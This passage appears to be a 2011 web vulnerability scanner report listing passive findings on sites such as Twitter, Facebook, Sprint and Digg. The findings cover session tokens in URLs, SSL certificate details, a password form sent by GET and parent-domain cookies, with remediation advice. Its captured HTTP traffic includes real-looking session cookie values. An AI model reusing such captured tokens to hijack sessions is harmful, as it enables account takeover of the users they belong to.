GET /log?event=availsFailure&failureAvails=%2225857%22%3A0.05939691936008503%2C%2223193%22%3A0.023731854751251523%2C%2225858%22%3A0.05542092357376735%2C%2228180%22%3A0.7897857684152726%2C%2220137%22%3A0.00400168723473%2C%2218971%22%3A0.047632449509923264%2C%2217530%22%3A0.0053719%2C%2223208%22%3A0.014658497154970253&adSourceId=28172&bidId=&afppId=&exSId=14279&adSpotId=11570&pet=preroll&pod=1&position=1&adPlanId=4148&adaptag=&categories=sports&sessionId=25w4w9&nap=false&context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte+Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&height=225&htmlEnabled=true&key=cinesport&uid=-7050735172170286629&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&duration=&id=&url=&width=300&zid=&playHeadTime=0&as=3&viewNo=&serverRev=66573&playerRev=66583&eov=1315097086197 HTTP/1.1
Host: qlog.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"; asptvw1="ap4148%2C1%2C2011-09-03%2F18-44-50"; audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"2\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}"; rtbData0="key=dataxu:value=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F:expiresAt=Wed+Nov+02+17%3A44%3A51+PDT+2011:32-Compatible=true"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/plain
Connection: Keep-Alive
Content-Length: 0


10.6. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sprint.tt.omtrdc.net
Path:   /m2/sprint/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/sprint/mbox/standard?mboxHost=www.sprint.com&mboxSession=1315097027971-178294&mboxPage=1315097027971-178294&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=sprint-interstitial-mbox&mboxId=0&mboxTime=1315079036636&mboxURL=http%3A%2F%2Fwww.sprint.com%2F&mboxReferrer=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dsprint%26date%3D2011-9-3%26sa%3DX&mboxVersion=40 HTTP/1.1
Host: sprint.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315097027971-178294.19; Domain=sprint.tt.omtrdc.net; Expires=Sun, 18-Sep-2011 00:45:30 GMT; Path=/m2/sprint
Content-Type: text/javascript
Content-Length: 179
Date: Sun, 04 Sep 2011 00:45:30 GMT
Server: Test & Target

mboxFactories.get('default').get('sprint-interstitial-mbox',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315097027971-178294.19");

10.7. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=150777544942552&app_id=150777544942552&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc9d46b2c%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13815c2e4%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df308fdb45c%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7783dc98%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b9cd374%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.196.55
X-Cnection: close
Date: Sun, 04 Sep 2011 00:44:11 GMT
Content-Length: 259

<script type="text/javascript">
parent.postMessage("cb=f7783dc98&origin=http\u00253A\u00252F\u00252Fwww.charlotteobserver.com\u00252Ff3bf22f854&relation=parent&transport=postmessage&frame=fe739c6", "h
...[SNIP]...

11. SSL certificate
There are 13 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
11.1. https://google.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://google.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  www.google.com
Issued by:  Thawte SGC CA
Valid from:  Thu Dec 17 18:00:00 GMT-06:00 2009
Valid to:  Sun Dec 18 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  Thawte SGC CA
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed May 12 18:00:00 GMT-06:00 2004
Valid to:  Mon May 12 17:59:59 GMT-06:00 2014

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

11.2. https://login.yahoo.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  login.yahoo.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon Dec 20 18:00:00 GMT-06:00 2010
Valid to:  Thu Jan 03 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:  Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Jan 13 13:20:32 GMT-06:00 2010
Valid to:  Wed Sep 30 12:19:47 GMT-06:00 2015

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

11.3. https://observ.subscribeobserver.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://observ.subscribeobserver.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  observ.subscribeobserver.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Wed May 11 18:00:00 GMT-06:00 2011
Valid to:  Mon May 28 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 18:00:00 GMT-06:00 1997
Valid to:  Mon Oct 24 17:59:59 GMT-06:00 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

11.4. https://cdns.gigya.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdns.gigya.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  cdns.gigya.com,ST=CALIFORNIA
Issued by:  Akamai Subordinate CA 3
Valid from:  Wed Nov 03 05:57:58 GMT-06:00 2010
Valid to:  Thu Nov 03 05:57:58 GMT-06:00 2011

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 09:32:00 GMT-06:00 2006
Valid to:  Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

11.5. https://commerce.us.reuters.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://commerce.us.reuters.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  commerce.us.reuters.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Sun Mar 06 18:00:00 GMT-06:00 2011
Valid to:  Tue Mar 06 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

11.6. https://docs.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://docs.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.google.com
Issued by:  Google Internet Authority
Valid from:  Thu Aug 11 21:49:02 GMT-06:00 2011
Valid to:  Sat Aug 11 21:59:02 GMT-06:00 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:  Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

11.7. https://mail.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mail.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  mail.google.com
Issued by:  Thawte SGC CA
Valid from:  Thu Dec 17 18:00:00 GMT-06:00 2009
Valid to:  Sun Dec 18 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  Thawte SGC CA
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed May 12 18:00:00 GMT-06:00 2004
Valid to:  Mon May 12 17:59:59 GMT-06:00 2014

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

11.8. https://maps-api-ssl.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.google.com
Issued by:  Google Internet Authority
Valid from:  Thu Aug 11 21:49:02 GMT-06:00 2011
Valid to:  Sat Aug 11 21:59:02 GMT-06:00 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:  Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

11.9. https://sites.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sites.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.google.com
Issued by:  Google Internet Authority
Valid from:  Thu Aug 11 21:49:02 GMT-06:00 2011
Valid to:  Sat Aug 11 21:59:02 GMT-06:00 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:  Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

11.10. https://socialize.gigya.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://socialize.gigya.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.gigya.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Nov 04 09:50:30 GMT-06:00 2010
Valid to:  Sun Nov 04 09:50:30 GMT-06:00 2012

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 GMT-06:00 2006
Valid to:  Sun Nov 15 19:54:37 GMT-06:00 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 11:06:20 GMT-06:00 2004
Valid to:  Thu Jun 29 11:06:20 GMT-06:00 2034

11.11. https://subscriberservices.mcclatchy.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://subscriberservices.mcclatchy.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  subscriberservices.mcclatchy.com
Issued by:  Entrust Certification Authority - L1C
Valid from:  Tue May 31 11:48:43 GMT-06:00 2011
Valid to:  Thu May 31 13:40:04 GMT-06:00 2012

Certificate chain #1

Issued to:  Entrust Certification Authority - L1C
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Thu Dec 10 14:43:54 GMT-06:00 2009
Valid to:  Tue Dec 10 15:13:54 GMT-06:00 2019

Certificate chain #2

Issued to:  Entrust.net Certification Authority (2048)
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Fri Dec 24 11:50:51 GMT-06:00 1999
Valid to:  Tue Jul 24 08:15:12 GMT-06:00 2029

11.12. https://www.linkedin.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.linkedin.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.linkedin.com
Issued by:  Thawte SGC CA - G2
Valid from:  Mon Jun 27 18:00:00 GMT-06:00 2011
Valid to:  Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  Thawte SGC CA - G2
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Wed Jul 28 18:00:00 GMT-06:00 2010
Valid to:  Tue Jul 28 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036

11.13. https://www.sprint.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.sprint.net
Issued by:  Entrust Certification Authority - L1B
Valid from:  Mon May 18 12:20:39 GMT-06:00 2009
Valid to:  Tue Jun 05 12:50:38 GMT-06:00 2012

Certificate chain #1

Issued to:  Entrust Certification Authority - L1B
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Mon Aug 25 12:14:26 GMT-06:00 2008
Valid to:  Sat Aug 25 12:44:26 GMT-06:00 2018

Certificate chain #2

Issued to:  Entrust.net Certification Authority (2048)
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Fri Dec 24 11:50:51 GMT-06:00 1999
Valid to:  Tue Jul 24 08:15:12 GMT-06:00 2029

12. Password field submitted using GET method

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:
The form contains the following password field:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=26937 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8468

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

13. Cookie scoped to parent domain
There are 95 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


13.1. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/UND_com/lists/notre-dame-football/statuses.json

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/UND_com/lists/notre-dame-football/statuses.json HTTP/1.1
Host: api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Sun, 04 Sep 2011 01:21:57 GMT
Server: hi
Status: 400 Bad Request
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 0
X-Runtime: 0.00635
Content-Type: application/json; charset=utf-8
Content-Length: 154
X-RateLimit-Class: api
Cache-Control: no-cache, max-age=300
X-RateLimit-Reset: 1315100623
Set-Cookie: guest_id=v1%3A131509931699548357; domain=.twitter.com; path=/; expires=Tue, 03 Sep 2013 13:21:56 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlMDU1ZDIyNWEzNjUyZDNiMzI4ZjY2YjQ1YTFhMjY5%250ANzA6DnJldHVybl90byIcaHR0cDovL3R3aXR0ZXIuY29tL2hvbWU6D2NyZWF0%250AZWRfYXRsKwieE%252BQxMgEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiU3MjY4NTJkZGFhNTM0%250AZTJhODhlNjkxY2EwYmFlZTlkNQ%253D%253D--27f28af8f4e2f6c861614383b06012a62c7dbf03; domain=.twitter.com; path=/; HttpOnly
Expires: Sun, 04 Sep 2011 01:26:56 GMT
Vary: Accept-Encoding
Connection: close

{"error":"Rate limit exceeded. Clients may not make more than 150 requests per hour.","request":"\/1\/UND_com\/lists\/notre-dame-football\/statuses.json"}

13.2. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

Summary

Severity:   Low
Confidence:   Firm
Host:   http://search.barnesandnoble.com
Path:   /The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826 HTTP/1.1
Host: search.barnesandnoble.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
P3P: CP="CAO DSP COR ADM DEV TAI PSA IVDo CONo HIS TELo DEL SAMo UNRo LEG PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Content-Length: 122283
Date: Sun, 04 Sep 2011 01:23:43 GMT
Connection: close
Set-Cookie: pds%5Fprof%5Flife=d=%2f0%2fSNRQANJZKOAJECq4fuATs16FghsQBYQAIAAoAewAAAHwAAgAAAAAAAAAAAAAA&v=5; domain=.barnesandnoble.com; expires=Fri, 02-Sep-2016 01:23:43 GMT; path=/
Set-Cookie: pds%5Flife=d=AQAw9qTVv8oLrLVmei2ledNrPyUXm7x5jgqi12MjRitKAKjnGigKHspVh2gOF1gyvghtGR%2ffErW1kHRLKuMKmS6B&v=5; domain=.barnesandnoble.com; expires=Fri, 02-Sep-2016 01:23:43 GMT; path=/
Set-Cookie: pds%5Fsess=d=AQDHu9rRnD%2fjrm8xcUgxEoj1Ylkl91VD8B%2bNGqKkf2oKsODN%2bAeOfCX4zlRMNjdk3QTJPGq5srW21wstdDzZfL2wxAnpys7HVCWpD97KNbjNRaKzSOJKXov3Z%2fvO1s3OLEc%3d&v=5; domain=.barnesandnoble.com; path=/
Set-Cookie: pds%5Fvcart%5Fsess=d=dof%2fQCAAIDJzmP6bP5jsrwnis1h3Kt8OO9Ec3ZRg76Y4McQBYQAEAAIAaQAAAAQA&v=5; domain=.barnesandnoble.com; path=/

...<!DOCTYPE html SYSTEM "about:legacy-compat"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="description" content="BARNES &amp; NOBLE: The Sacramento Bee b
...[SNIP]...

13.3. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aTnsXDNj6WqoyhURALhZcBrHwBvZaUWbjSqX2DmFYQP3yOAgnNKGLlr9eglkIxJOkrcm2VawOaWiZbjMoBQ; path=/; domain=.tribalfusion.com; expires=Sat, 03-Dec-2011 01:01:39 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 368
Expires: 0
Connection: keep-alive

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/aSmMvf4drZdSsZbF4P3HpHaqTHfh0rQjYUF90qEpSrrHWUY0THUWmFQmRUFs1q3s4TFc2q7XnTFGXFZbfUWMRoAMBnGYvpWfE5TQ73dem3A7KnF3ZdXsfRY
...[SNIP]...

13.4. http://ad.doubleclick.net/jump/N763.no_url_specifiedOX2619/B5770010.3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N763.no_url_specifiedOX2619/B5770010.3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/N763.no_url_specifiedOX2619/B5770010.3 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://espn.go.com/college-football/team/_/id/99/lsu-tigers?ex_cid=2011_bnnr_CFB_xxxx_awrs
Set-Cookie: id=229b025847010047|1181183/541316/15221|t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1; path=/; domain=.doubleclick.net; expires=Fri, 30 Aug 2013 01:33:36 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 04 Sep 2011 01:21:32 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


13.5. http://ad.doubleclick.net/jump/N763.usatoday.comOX3622/B5770010.5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N763.usatoday.comOX3622/B5770010.5

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
